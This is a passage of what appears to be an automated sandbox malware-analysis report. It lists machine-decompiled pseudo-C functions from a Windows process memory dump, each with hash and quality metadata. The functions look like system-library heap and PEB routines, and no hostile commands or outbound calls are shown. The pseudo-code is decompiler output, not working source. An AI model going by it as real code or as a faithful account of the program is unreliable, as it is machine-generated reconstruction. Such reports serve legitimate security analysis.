                                                    					 *_t48 = _t52;
                                                    					 *_t33 = 1;
                                                    					L3:
                                                    					_t16 = 0;
                                                    					L4:
                                                    					return _t16;
                                                    				}
                                                    				_t17 = L04B7A840(__edx, __ecx, __ecx, _t52, 0x4c37b10, 1, 0);
                                                    				if(_t17 == 0xffffffff) {
                                                    					_t37 =  *0x4c37b10; // 0x10
                                                    					_t3 = _t37 + 0x27; // 0x37
                                                    					__eflags = _t3 >> 5 -  *0x4c37b18; // 0x1
                                                    					if(__eflags > 0) {
                                                    						_t38 =  *0x4c37b9c; // 0x0
                                                    						_t4 = _t52 + 0x27; // 0x37
                                                    						_v8 = _t4 >> 5;
                                                    						_t50 = L04B64620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                    						__eflags = _t50;
                                                    						if(_t50 == 0) {
                                                    							_t16 = 0xc0000017;
                                                    							goto L4;
                                                    						}
                                                    						 *0x4c37b18 = _v8;
                                                    						_t8 = _t52 + 7; // 0x17
                                                    						E04B8F3E0(_t50,  *0x4c37b14, _t8 >> 3);
                                                    						_t28 =  *0x4c37b14; // 0x77f07b0c
                                                    						__eflags = _t28 - 0x4c37b0c;
                                                    						if(_t28 != 0x4c37b0c) {
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                    						}
                                                    						_t9 = _t52 + 8; // 0x18
                                                    						 *0x4c37b14 = _t50;
                                                    						_t48 = _v12;
                                                    						 *0x4c37b10 = _t9;
                                                    						goto L6;
                                                    					}
                                                    					 *0x4c37b10 = _t37 + 8;
                                                    					goto L6;
                                                    				}
                                                    				 *__ecx = _t17;
                                                    				 *_t33 = 0;
                                                    				goto L3;
                                                    			}

















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e0343e6d9349c4e6837288374fa06f6b23b2166c4a1b1be735be8409796b9b6
                                                    • Instruction ID: 2afa9088cffb82ee49365720db1fbb9a5e4d80dfac8c961b0ca84909f7c68ef4
                                                    • Opcode Fuzzy Hash: 2e0343e6d9349c4e6837288374fa06f6b23b2166c4a1b1be735be8409796b9b6
                                                    • Instruction Fuzzy Hash: D2318DF56012049BD751CF18D880F6A7BF9FB8971AF1489DAE02597240E7B8BD01CBD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 97%
                                                    			E04B761A0(signed int* __ecx) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				intOrPtr* _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _t30;
                                                    				intOrPtr _t31;
                                                    				void* _t32;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t37;
                                                    				intOrPtr _t49;
                                                    				signed int _t51;
                                                    				intOrPtr _t52;
                                                    				signed int _t54;
                                                    				void* _t59;
                                                    				signed int* _t61;
                                                    				intOrPtr* _t64;
                                                    
                                                    				_t61 = __ecx;
                                                    				_v12 = 0;
                                                    				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                    				_v16 = __ecx;
                                                    				_v8 = 0;
                                                    				if(_t30 == 0) {
                                                    					L6:
                                                    					_t31 = 0;
                                                    					L7:
                                                    					return _t31;
                                                    				}
                                                    				_t32 = _t30 + 0x5d8;
                                                    				if(_t32 == 0) {
                                                    					goto L6;
                                                    				}
                                                    				_t59 = _t32 + 0x30;
                                                    				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                    					goto L6;
                                                    				}
                                                    				if(__ecx != 0) {
                                                    					 *((intOrPtr*)(__ecx)) = 0;
                                                    					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                    				}
                                                    				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                    					_t51 =  *(_t32 + 0x10);
                                                    					_t33 = _t32 + 0x10;
                                                    					_v20 = _t33;
                                                    					_t54 =  *(_t33 + 4);
                                                    					if((_t51 | _t54) == 0) {
                                                    						_t37 = E04B75E50(0x4b267cc, 0, 0,  &_v12);
                                                    						if(_t37 != 0) {
                                                    							goto L6;
                                                    						}
                                                    						_t52 = _v8;
                                                    						asm("lock cmpxchg8b [esi]");
                                                    						_t64 = _v16;
                                                    						_t49 = _t37;
                                                    						_v20 = 0;
                                                    						if(_t37 == 0) {
                                                    							if(_t64 != 0) {
                                                    								 *_t64 = _v12;
                                                    								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                    							}
                                                    							E04C19D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                    							_t31 = 1;
                                                    							goto L7;
                                                    						}
                                                    						E04B4F7C0(_t52, _v12, _t52, 0);
                                                    						if(_t64 != 0) {
                                                    							 *_t64 = _t49;
                                                    							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                    						}
                                                    						L12:
                                                    						_t31 = 1;
                                                    						goto L7;
                                                    					}
                                                    					if(_t61 != 0) {
                                                    						 *_t61 = _t51;
                                                    						_t61[1] = _t54;
                                                    					}
                                                    					goto L12;
                                                    				} else {
                                                    					goto L6;
                                                    				}
                                                    			}




















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f754a0d31ce6f2fca564b5fe86cf1afffb146146f76bb74884579763324b66ba
                                                    • Instruction ID: df664bcef062f13254797c18d2a4772f753ad934c93f1084f7ee557811ddbf39
                                                    • Opcode Fuzzy Hash: f754a0d31ce6f2fca564b5fe86cf1afffb146146f76bb74884579763324b66ba
                                                    • Instruction Fuzzy Hash: 1A318D716097018FD360DF19C904B6AB7E5FB88B10F0949ADE9999B761EBB0FC04CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 95%
                                                    			E04B4AA16(signed short* __ecx) {
                                                    				signed int _v8;
                                                    				intOrPtr _v12;
                                                    				signed short _v16;
                                                    				intOrPtr _v20;
                                                    				signed short _v24;
                                                    				signed short _v28;
                                                    				void* _v32;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				intOrPtr _t25;
                                                    				signed short _t38;
                                                    				signed short* _t42;
                                                    				signed int _t44;
                                                    				signed short* _t52;
                                                    				signed short _t53;
                                                    				signed int _t54;
                                                    
                                                    				_v8 =  *0x4c3d360 ^ _t54;
                                                    				_t42 = __ecx;
                                                    				_t44 =  *__ecx & 0x0000ffff;
                                                    				_t52 =  &(__ecx[2]);
                                                    				_t51 = _t44 + 2;
                                                    				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                    					L4:
                                                    					_t25 =  *0x4c37b9c; // 0x0
                                                    					_t53 = L04B64620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                    					__eflags = _t53;
                                                    					if(_t53 == 0) {
                                                    						L3:
                                                    						return E04B8B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                    					} else {
                                                    						E04B8F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                    						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                    						L2:
                                                    						_t51 = 4;
                                                    						if(L04B56C59(_t53, _t51, _t58) != 0) {
                                                    							_t28 = E04B75E50(0x4b2c338, 0, 0,  &_v32);
                                                    							__eflags = _t28;
                                                    							if(_t28 == 0) {
                                                    								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                    								__eflags = _t38;
                                                    								_v24 = _t53;
                                                    								_v16 = _t38;
                                                    								_v20 = 0;
                                                    								_v12 = 0;
                                                    								E04B7B230(_v32, _v28, 0x4b2c2d8, 1,  &_v24);
                                                    								_t28 = E04B4F7A0(_v32, _v28);
                                                    							}
                                                    							__eflags = _t53 -  *_t52;
                                                    							if(_t53 !=  *_t52) {
                                                    								_t28 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                    							}
                                                    						}
                                                    						goto L3;
                                                    					}
                                                    				}
                                                    				_t53 =  *_t52;
                                                    				_t44 = _t44 >> 1;
                                                    				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                    				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                    					goto L4;
                                                    				}
                                                    				goto L2;
                                                    			}





















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c76a93ab008b7aa3fe68fe2a392e70db18c63bf52d88973e4f25e4f7abf2dd5
                                                    • Instruction ID: 416514325ba5688d56fb77055b92f951ce721b4bf121500295087c9e4c07b778
                                                    • Opcode Fuzzy Hash: 7c76a93ab008b7aa3fe68fe2a392e70db18c63bf52d88973e4f25e4f7abf2dd5
                                                    • Instruction Fuzzy Hash: E131C571A00119ABDF109F68CD81A7FB7B9EF48704F0144A9F905D7150EB78BD11DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E04B88EC7(void* __ecx, void* __edx) {
                                                    				signed int _v8;
                                                    				signed int* _v16;
                                                    				intOrPtr _v20;
                                                    				signed int* _v24;
                                                    				char* _v28;
                                                    				signed int* _v32;
                                                    				intOrPtr _v36;
                                                    				signed int* _v40;
                                                    				signed int* _v44;
                                                    				signed int* _v48;
                                                    				intOrPtr _v52;
                                                    				signed int* _v56;
                                                    				signed int* _v60;
                                                    				signed int* _v64;
                                                    				intOrPtr _v68;
                                                    				signed int* _v72;
                                                    				char* _v76;
                                                    				signed int* _v80;
                                                    				signed int _v84;
                                                    				signed int* _v88;
                                                    				intOrPtr _v92;
                                                    				signed int* _v96;
                                                    				intOrPtr _v100;
                                                    				signed int* _v104;
                                                    				signed int* _v108;
                                                    				char _v140;
                                                    				signed int _v144;
                                                    				signed int _v148;
                                                    				signed int* _v152;
                                                    				char _v156;
                                                    				signed int* _v160;
                                                    				char _v164;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* _t67;
                                                    				intOrPtr _t70;
                                                    				void* _t71;
                                                    				void* _t72;
                                                    				signed int _t73;
                                                    
                                                    				_t69 = __edx;
                                                    				_v8 =  *0x4c3d360 ^ _t73;
                                                    				_t48 =  *[fs:0x30];
                                                    				_t72 = __edx;
                                                    				_t71 = __ecx;
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                    					_t48 = E04B74E70(0x4c386e4, 0x4b89490, 0, 0);
                                                    					if( *0x4c353e8 > 5 && E04B88F33(0x4c353e8, 0, 0x2000) != 0) {
                                                    						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                    						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                    						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                    						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                    						_v108 =  &_v84;
                                                    						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                    						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                    						_v76 =  &_v156;
                                                    						_t70 = 8;
                                                    						_v60 =  &_v144;
                                                    						_t67 = 4;
                                                    						_v44 =  &_v148;
                                                    						_v152 = 0;
                                                    						_v160 = 0;
                                                    						_v104 = 0;
                                                    						_v100 = 2;
                                                    						_v96 = 0;
                                                    						_v88 = 0;
                                                    						_v80 = 0;
                                                    						_v72 = 0;
                                                    						_v68 = _t70;
                                                    						_v64 = 0;
                                                    						_v56 = 0;
                                                    						_v52 = 0x4c353e8;
                                                    						_v48 = 0;
                                                    						_v40 = 0;
                                                    						_v36 = 0x4c353e8;
                                                    						_v32 = 0;
                                                    						_v28 =  &_v164;
                                                    						_v24 = 0;
                                                    						_v20 = _t70;
                                                    						_v16 = 0;
                                                    						_t69 = 0x4b2bc46;
                                                    						_t48 = E04BC7B9C(0x4c353e8, 0x4b2bc46, _t67, 0x4c353e8, _t70,  &_v140);
                                                    					}
                                                    				}
                                                    				return E04B8B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                    			}












































                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9c16d03175ec409b6ec33f90e5dcabe7cf16ad1a8662ac6899a113c5503d325
                                                    • Instruction ID: d1deb2f0bd11c353342d72f4f313a8c42dbe613cbdc5ee5d078a8ae605f48893
                                                    • Opcode Fuzzy Hash: a9c16d03175ec409b6ec33f90e5dcabe7cf16ad1a8662ac6899a113c5503d325
                                                    • Instruction Fuzzy Hash: F841A2B1D00318AFDB24DFAAD980AADFBF4FB48314F5041AEE519A7201E7746A44CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E04B84A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                    				signed int _v8;
                                                    				signed int* _v12;
                                                    				char _v13;
                                                    				signed int _v16;
                                                    				char _v21;
                                                    				signed int* _v24;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t29;
                                                    				signed int* _t32;
                                                    				signed int* _t41;
                                                    				signed int _t42;
                                                    				void* _t43;
                                                    				intOrPtr* _t51;
                                                    				void* _t52;
                                                    				signed int _t53;
                                                    				signed int _t58;
                                                    				void* _t59;
                                                    				signed int _t60;
                                                    				signed int _t62;
                                                    
                                                    				_t49 = __edx;
                                                    				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                    				_t26 =  *0x4c3d360 ^ _t62;
                                                    				_v8 =  *0x4c3d360 ^ _t62;
                                                    				_t41 = __ecx;
                                                    				_t51 = __edx;
                                                    				_v12 = __ecx;
                                                    				if(_a4 == 0) {
                                                    					if(_a8 != 0) {
                                                    						goto L1;
                                                    					}
                                                    					_v13 = 1;
                                                    					E04B62280(_t26, 0x4c38608);
                                                    					_t58 =  *_t41;
                                                    					if(_t58 == 0) {
                                                    						L11:
                                                    						E04B5FFB0(_t41, _t51, 0x4c38608);
                                                    						L2:
                                                    						 *0x4c3b1e0(_a4, _a8);
                                                    						_t42 =  *_t51();
                                                    						if(_t42 == 0) {
                                                    							_t29 = 0;
                                                    							L5:
                                                    							_pop(_t52);
                                                    							_pop(_t59);
                                                    							_pop(_t43);
                                                    							return E04B8B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                    						}
                                                    						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                    						if(_v21 != 0) {
                                                    							_t53 = 0;
                                                    							E04B62280(_t28, 0x4c38608);
                                                    							_t32 = _v24;
                                                    							if( *_t32 == _t58) {
                                                    								 *_t32 = _t42;
                                                    								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                    								if(_t58 != 0) {
                                                    									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                    									asm("sbb edi, edi");
                                                    									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                    								}
                                                    							}
                                                    							E04B5FFB0(_t42, _t53, 0x4c38608);
                                                    							if(_t53 != 0) {
                                                    								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                    							}
                                                    						}
                                                    						_t29 = _t42;
                                                    						goto L5;
                                                    					}
                                                    					if( *((char*)(_t58 + 0x40)) != 0) {
                                                    						L10:
                                                    						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                    						E04B5FFB0(_t41, _t51, 0x4c38608);
                                                    						_t29 = _t58;
                                                    						goto L5;
                                                    					}
                                                    					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                    					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                    						goto L11;
                                                    					}
                                                    					goto L10;
                                                    				}
                                                    				L1:
                                                    				_v13 = 0;
                                                    				_t58 = 0;
                                                    				goto L2;
                                                    			}

























                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b05c21cad767db644adaef566452849bf8bb710a3dbedc9015b1ffd18d855331
                                                    • Instruction ID: 362aec435c03bb7c9ea126336b8d03ac92c63ca5b0d12a1e29d61bf335a73664
                                                    • Opcode Fuzzy Hash: b05c21cad767db644adaef566452849bf8bb710a3dbedc9015b1ffd18d855331
                                                    • Instruction Fuzzy Hash: 3031F1322063119BDB21BF64C980B7AFBE5FB80B15F0008ADF8564B650E774F801CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 74%
                                                    			E04B7E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                    				intOrPtr* _v0;
                                                    				signed char _v4;
                                                    				signed int _v8;
                                                    				void* __ecx;
                                                    				void* __ebp;
                                                    				void* _t37;
                                                    				intOrPtr _t38;
                                                    				signed int _t44;
                                                    				signed char _t52;
                                                    				void* _t54;
                                                    				intOrPtr* _t56;
                                                    				void* _t58;
                                                    				char* _t59;
                                                    				signed int _t62;
                                                    
                                                    				_t58 = __edx;
                                                    				_push(0);
                                                    				_push(4);
                                                    				_push( &_v8);
                                                    				_push(0x24);
                                                    				_push(0xffffffff);
                                                    				if(E04B89670() < 0) {
                                                    					L04B9DF30(_t54, _t58, _t35);
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					_push(_t54);
                                                    					_t52 = _v4;
                                                    					if(_t52 > 8) {
                                                    						_t37 = 0xc0000078;
                                                    					} else {
                                                    						_t38 =  *0x4c37b9c; // 0x0
                                                    						_t62 = _t52 & 0x000000ff;
                                                    						_t59 = L04B64620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                    						if(_t59 == 0) {
                                                    							_t37 = 0xc0000017;
                                                    						} else {
                                                    							_t56 = _v0;
                                                    							 *(_t59 + 1) = _t52;
                                                    							 *_t59 = 1;
                                                    							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                    							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                    							_t44 = _t62 - 1;
                                                    							if(_t44 <= 7) {
                                                    								switch( *((intOrPtr*)(_t44 * 4 +  &M04B7E810))) {
                                                    									case 0:
                                                    										L6:
                                                    										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                    										goto L7;
                                                    									case 1:
                                                    										L13:
                                                    										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                    										goto L6;
                                                    									case 2:
                                                    										L12:
                                                    										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                    										goto L13;
                                                    									case 3:
                                                    										L11:
                                                    										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                    										goto L12;
                                                    									case 4:
                                                    										L10:
                                                    										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                    										goto L11;
                                                    									case 5:
                                                    										L9:
                                                    										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                    										goto L10;
                                                    									case 6:
                                                    										L17:
                                                    										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                    										goto L9;
                                                    									case 7:
                                                    										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                    										goto L17;
                                                    								}
                                                    							}
                                                    							L7:
                                                    							 *_a40 = _t59;
                                                    							_t37 = 0;
                                                    						}
                                                    					}
                                                    					return _t37;
                                                    				} else {
                                                    					_push(0x20);
                                                    					asm("ror eax, cl");
                                                    					return _a4 ^ _v8;
                                                    				}
                                                    			}


















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 28df29e037c327b88d3fd8bf2306c6be6c50f96af77135cf601ae203d3122d8c
                                                    • Instruction ID: 72a679bcb487253c360727936e15227ac33c5e3e781ece04d228e67cac7dacbe
                                                    • Opcode Fuzzy Hash: 28df29e037c327b88d3fd8bf2306c6be6c50f96af77135cf601ae203d3122d8c
                                                    • Instruction Fuzzy Hash: A4315C75A14249EFD744CF58D841B9AB7E8FF19314F1482AAF914CB341E635ED80CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E04B7BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				intOrPtr _t22;
                                                    				intOrPtr* _t41;
                                                    				intOrPtr _t51;
                                                    
                                                    				_t51 =  *0x4c36100; // 0x4c
                                                    				_v12 = __edx;
                                                    				_v8 = __ecx;
                                                    				if(_t51 >= 0x800) {
                                                    					L12:
                                                    					return 0;
                                                    				} else {
                                                    					goto L1;
                                                    				}
                                                    				while(1) {
                                                    					L1:
                                                    					_t22 = _t51;
                                                    					asm("lock cmpxchg [ecx], edx");
                                                    					if(_t51 == _t22) {
                                                    						break;
                                                    					}
                                                    					_t51 = _t22;
                                                    					if(_t22 < 0x800) {
                                                    						continue;
                                                    					}
                                                    					goto L12;
                                                    				}
                                                    				E04B62280(0xd, 0x17d0f1a0);
                                                    				_t41 =  *0x4c360f8; // 0x0
                                                    				if(_t41 != 0) {
                                                    					 *0x4c360f8 =  *_t41;
                                                    					 *0x4c360fc =  *0x4c360fc + 0xffff;
                                                    				}
                                                    				E04B5FFB0(_t41, 0x800, 0x17d0f1a0);
                                                    				if(_t41 != 0) {
                                                    					L6:
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                    					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                    					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                    					do {
                                                    						asm("lock xadd [0x4c360f0], ax");
                                                    						 *((short*)(_t41 + 0x34)) = 1;
                                                    					} while (1 == 0);
                                                    					goto L8;
                                                    				} else {
                                                    					_t41 = L04B64620(0x4c36100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                    					if(_t41 == 0) {
                                                    						L11:
                                                    						asm("lock dec dword [0x4c36100]");
                                                    						L8:
                                                    						return _t41;
                                                    					}
                                                    					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                    					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                    					if(_t41 == 0) {
                                                    						goto L11;
                                                    					}
                                                    					goto L6;
                                                    				}
                                                    			}











                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 340a433550efb1d22386028b2d545fd1d09d7e65674aadb54222a6fb45fab742
                                                    • Instruction ID: 8008a2db1e0fb807265ca932475db31bbd7dc18c3ee9b3ee5296260531670202
                                                    • Opcode Fuzzy Hash: 340a433550efb1d22386028b2d545fd1d09d7e65674aadb54222a6fb45fab742
                                                    • Instruction Fuzzy Hash: 3731FF3AA04605ABDB21DF58C4807A677A4EB1831AF0080B8ED64DB201E678FD059F80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 60%
                                                    			E04B71DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                    				char _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr* _v20;
                                                    				void* _t22;
                                                    				char _t23;
                                                    				void* _t36;
                                                    				intOrPtr _t42;
                                                    				intOrPtr _t43;
                                                    
                                                    				_v12 = __ecx;
                                                    				_t43 = 0;
                                                    				_v20 = __edx;
                                                    				_t42 =  *__edx;
                                                    				 *__edx = 0;
                                                    				_v16 = _t42;
                                                    				_push( &_v8);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(6);
                                                    				_push(0);
                                                    				_push(__ecx);
                                                    				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                    				_push(_t36);
                                                    				_t22 = E04B6F460();
                                                    				if(_t22 < 0) {
                                                    					if(_t22 == 0xc0000023) {
                                                    						goto L1;
                                                    					}
                                                    					L3:
                                                    					return _t43;
                                                    				}
                                                    				L1:
                                                    				_t23 = _v8;
                                                    				if(_t23 != 0) {
                                                    					_t38 = _a4;
                                                    					if(_t23 >  *_a4) {
                                                    						_t42 = L04B64620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                    						if(_t42 == 0) {
                                                    							goto L3;
                                                    						}
                                                    						_t23 = _v8;
                                                    					}
                                                    					_push( &_v8);
                                                    					_push(_t23);
                                                    					_push(_t42);
                                                    					_push(6);
                                                    					_push(_t43);
                                                    					_push(_v12);
                                                    					_push(_t36);
                                                    					if(E04B6F460() < 0) {
                                                    						if(_t42 != 0 && _t42 != _v16) {
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                    						}
                                                    						goto L3;
                                                    					}
                                                    					 *_v20 = _t42;
                                                    					 *_a4 = _v8;
                                                    				}
                                                    				_t43 = 1;
                                                    				goto L3;
                                                    			}













                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction ID: c1fbf0df63a8f8c04ba0d10b0cb019b64779a9c95d149ee2723d390184ed5371
                                                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction Fuzzy Hash: DE216B72600619AFD721CF9DDC80EAABBBDEF85684F2144A5E91597310DA34BE01DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E04B49100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                    				signed int _t53;
                                                    				signed int _t56;
                                                    				signed int* _t60;
                                                    				signed int _t63;
                                                    				signed int _t66;
                                                    				signed int _t69;
                                                    				void* _t70;
                                                    				intOrPtr* _t72;
                                                    				void* _t78;
                                                    				void* _t79;
                                                    				signed int _t80;
                                                    				intOrPtr _t82;
                                                    				void* _t85;
                                                    				void* _t88;
                                                    				void* _t89;
                                                    
                                                    				_t84 = __esi;
                                                    				_t70 = __ecx;
                                                    				_t68 = __ebx;
                                                    				_push(0x2c);
                                                    				_push(0x4c1f6e8);
                                                    				E04B9D0E8(__ebx, __edi, __esi);
                                                    				 *((char*)(_t85 - 0x1d)) = 0;
                                                    				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                    				if(_t82 == 0) {
                                                    					L4:
                                                    					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
